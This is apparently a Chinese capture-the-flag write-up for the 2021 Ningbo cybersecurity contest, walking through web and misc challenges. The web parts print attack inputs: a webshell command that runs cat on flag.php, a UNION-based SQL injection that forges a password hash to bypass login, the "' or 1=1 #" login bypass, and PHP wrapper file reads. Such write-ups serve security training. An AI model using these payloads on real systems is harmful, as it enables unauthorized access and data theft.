2021宁波市第四届网络安全大赛

简单的php

和nepctf那题litter_thick一样的
找到有一个flag.php
在这里插入图片描述
然后写个马进去,cat一下flag.php就可以了

?1=echo `cat flag.php`;

2021宁波市第四届网络安全大赛_第1张图片

index

index.php~有源码

 
include ("config.php");
$db = mysql_connect($dbhost, $dbuser, $dbpass);
mysql_select_db($database, $db) or die("Could not select database");
mysql_query("set names utf8");
if ($conn->connect_error) {
     
    die("Connection failed: " . mysql_error($conn));
}

$user = $_POST[user];
$pass = md5($_POST[pass]);

$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (! $query) {
     
    printf("Error: %s\n", mysqli_error($conn));
    exit();
}
$row = mysql_fetch_array($query);
if (($row[pw]) && (! strcasecmp($pass, $row[pw]))) {
     
    echo "

Logged in! Key: " . $flag . "

"
; } else { echo ("

Log in failure!

"
); }

strcasecmp()函数,匹配到相等就返回0
满足这个式子就可以了

($row[pw]) && (! strcasecmp($pass, $row[pw]))

那么只要求$row(pw)和我们传进去password一样就可以了
payload:

user=1' union select '71f67e393280fa78ab9f6ce81b54bc72'#&pass=jxnu

2021宁波市第四届网络安全大赛_第2张图片

getflag

直接访问/flag.php

helloworld

.index.php.swp找到备份文件

 
    require_once('config.php');
    $file = $_GET['file'];
    $file_text = file_get_contents($file);
    print_r($file_text);
    if($file_text == $test666){
     
        print_r($flag);
    }
 ?>

那就直接读取config.php
sss607
在这里插入图片描述
伪协议再打一下就可以了2021宁波市第四届网络安全大赛_第3张图片

2021宁波市第四届网络安全大赛_第4张图片

文件管理网站

guest可以登录,但是什么功能都没有

这个万能密码可以登录进去1' or 1=1 #,身份还是guest

看了一下目录扫描的结果,直接扫到1.htaccess。。。
2021宁波市第四届网络安全大赛_第5张图片
直接访问,有一个
2021宁波市第四届网络安全大赛_第6张图片
拿到flag
2021宁波市第四届网络安全大赛_第7张图片

简单编码

jsfuck,运行一下是这个
2021宁波市第四届网络安全大赛_第8张图片

美丽的小姐

CRC出问题,改宽高就好了
在这里插入图片描述
2021宁波市第四届网络安全大赛_第9张图片

音符

文件尾写了password为ejfg
在这里插入图片描述
音符解码
2021宁波市第四届网络安全大赛_第10张图片

简单乘法

jpg隐写,jphide
在这里插入图片描述
但是少了密码

听雨寻知音

010看了一下又一个png头
foremost分离出一个二维码
2021宁波市第四届网络安全大赛_第11张图片
修复一下定位点
2021宁波市第四届网络安全大赛_第12张图片
打开一个网址
2021宁波市第四届网络安全大赛_第13张图片滴滴答滴滴答滴滴滴答滴答滴滴答滴滴答答滴滴滴滴滴答答答滴答
莫斯电码
…-…-…-.-…-…–…—.-
但是不知道怎么分割

nike

是一个比赛的原题

代码美化一下
然后py2跑
在这里插入图片描述
改一下
2021宁波市第四届网络安全大赛_第14张图片
跑出
在这里插入图片描述
得到flag
2021宁波市第四届网络安全大赛_第15张图片

你可能感兴趣的:(比赛wp)